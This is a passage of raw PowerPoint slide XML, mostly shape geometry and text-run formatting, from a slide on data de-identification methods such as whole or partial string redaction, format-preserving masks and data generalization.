                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Methods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61815" y="731519"/>
            <a:ext cx="8531352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61489" y="1755799"/>
            <a:ext cx="12728575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76300" marR="5080" indent="-864235">
              <a:lnSpc>
                <a:spcPct val="114999"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="8665845" algn="l"/>
                <a:tab pos="9915525" algn="l"/>
              </a:tabLst>
            </a:pP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570">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>-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identif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ca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ion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meth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ds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ual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im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p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lemente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pa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	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Da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abas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Management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stem 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(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50">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>BMS)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hosting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dat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.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Databa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570">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>-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identif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ca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ion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me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hods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ca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	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goriz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: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08404" y="3515867"/>
            <a:ext cx="6174105" cy="1965960"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6174105" h="1965960">
                <a:moveTo>
                  <a:pt x="5846064" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="327659" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="279237" y="3552"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="233022" y="13871"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="189521" y="30451"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="149239" y="52784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="112685" y="80364"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="80364" y="112685"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52784" y="149239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30451" y="189521"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13871" y="233022"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3552" y="279237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="327660"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1638300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3552" y="1686722"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13871" y="1732937"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30451" y="1776438"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52784" y="1816720"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="80364" y="1853274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="112685" y="1885595"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="149239" y="1913175"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="189521" y="1935508"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="233022" y="1952088"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="279237" y="1962407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="327659" y="1965960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5846064" y="1965960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5894486" y="1962407"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5940701" y="1952088"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5984202" y="1935508"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6024484" y="1913175"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6061038" y="1885595"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6093359" y="1853274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6120939" y="1816720"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6143272" y="1776438"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6159852" y="1732937"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6170171" y="1686722"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6173724" y="1638300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6173724" y="327660"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6170171" y="279237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6159852" y="233022"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6143272" y="189521"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6120939" y="149239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6093359" y="112685"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6061038" y="80364"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6024484" y="52784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5984202" y="30451"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5940701" y="13871"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5894486" y="3552"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5846064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882901" y="3772240"/>
            <a:ext cx="4627245" cy="1367155"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="129539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19"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="110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10">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Whole</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-13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44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-11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0">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>part</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-30">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-50">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-25">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-13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0">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>redac</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-15">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-35">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ion</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-15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0">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-11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0">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>stri</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-70">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-160">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-65">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:endParaRPr sz="20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Clr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="110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-20">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Format</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-515">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-20">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-25">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-35">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-25">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-35">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>erv</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-30">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-25">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-150">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-15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0">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>mas</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-40">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>k</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-65">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:endParaRPr sz="20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Clr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="110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-25">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Irreversible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08404" y="6560819"/>
            <a:ext cx="6174105" cy="1739264"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6174105" h="1739265">
                <a:moveTo>
                  <a:pt x="5883910" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="289813" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="242814" y="3794"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="198225" y="14778"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="156645" y="32356"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="118670" y="55928"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="84899" y="84899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55928" y="118670"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32356" y="156645"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14778" y="198225"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3794" y="242814"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="289813"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1449057"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3794" y="1496069"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14778" y="1540666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32356" y="1582251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55928" y="1620226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="84899" y="1653997"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="118670" y="1682965"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="156645" y="1706534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="198225" y="1724108"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="242814" y="1735090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="289813" y="1738883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5883910" y="1738883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5930909" y="1735090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5975498" y="1724108"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6017078" y="1706534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6055053" y="1682965"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6088824" y="1653997"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6117795" y="1620226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6141367" y="1582251"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6158945" y="1540666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6169929" y="1496069"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6173724" y="1449057"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6173724" y="289813"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6169929" y="242814"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6158945" y="198225"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6141367" y="156645"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6117795" y="118670"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6088824" y="84899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6055053" y="55928"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6017078" y="32356"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5975498" y="14778"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5930909" y="3794"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5883910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8586216" y="3029711"/>
            <a:ext cx="6175375" cy="2452370"/>
            <a:chOff x="8586216" y="3029711"/>
            <a:chExt cx="6175375" cy="2452370"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="object 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8586216" y="3515867"/>
              <a:ext cx="6175375" cy="1965960"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="6175375" h="1965960">
                  <a:moveTo>
                    <a:pt x="5847587" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="327659" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="279237" y="3552"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233022" y="13871"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189521" y="30451"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="149239" y="52784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112685" y="80364"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80364" y="112685"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52784" y="149239"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30451" y="189521"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13871" y="233022"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3552" y="279237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="327660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1638300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3552" y="1686722"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13871" y="1732937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30451" y="1776438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="52784" y="1816720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80364" y="1853274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112685" y="1885595"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="149239" y="1913175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189521" y="1935508"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233022" y="1952088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="279237" y="1962407"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327659" y="1965960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5847587" y="1965960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5896010" y="1962407"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5942225" y="1952088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5985726" y="1935508"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6026008" y="1913175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6062562" y="1885595"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6094883" y="1853274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6122463" y="1816720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6144796" y="1776438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6161376" y="1732937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6171695" y="1686722"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6175247" y="1638300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6175247" y="327660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6171695" y="279237"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6161376" y="233022"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6144796" y="189521"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6122463" y="149239"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6094883" y="112685"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6062562" y="80364"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6026008" y="52784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5985726" y="30451"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5942225" y="13871"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5896010" y="3552"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5847587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886188" y="3029711"/>
              <a:ext cx="3801110" cy="736600"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3801109" h="736600">
                  <a:moveTo>
                    <a:pt x="3678173" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="122681" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74902" y="9632"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35909" y="35909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9632" y="74902"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="122682"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="613410"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9632" y="661136"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35909" y="700135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74902" y="726441"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122681" y="736091"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3678173" y="736091"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3725900" y="726441"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3764899" y="700135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3791205" y="661136"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3800855" y="613410"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3800855" y="122682"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3791205" y="74902"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3764899" y="35909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3725900" y="9632"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3678173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871598" y="7278369"/>
            <a:ext cx="261493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SzPct val="110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-15">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Data</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-12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70">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-114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60">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-50">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>enerali</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-60">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>z</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-20">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ed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166872" y="3029711"/>
            <a:ext cx="3801110" cy="736600"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3801109" h="736600">
                <a:moveTo>
                  <a:pt x="3678174" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="122681" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74902" y="9632"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35909" y="35909"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9632" y="74902"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="122682"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="613410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9632" y="661136"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35909" y="700135"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74902" y="726441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="122681" y="736091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3678174" y="736091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3725900" y="726441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3764899" y="700135"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3791205" y="661136"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3800855" y="613410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3800855" y="122682"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3791205" y="74902"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3764899" y="35909"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3725900" y="9632"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3678174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" name="object 13"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8586216" y="6227064"/>
            <a:ext cx="6175375" cy="2072639"/>
            <a:chOff x="8586216" y="6227064"/>
            <a:chExt cx="6175375" cy="2072639"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="object 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8586216" y="6560820"/>
              <a:ext cx="6175375" cy="1739264"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
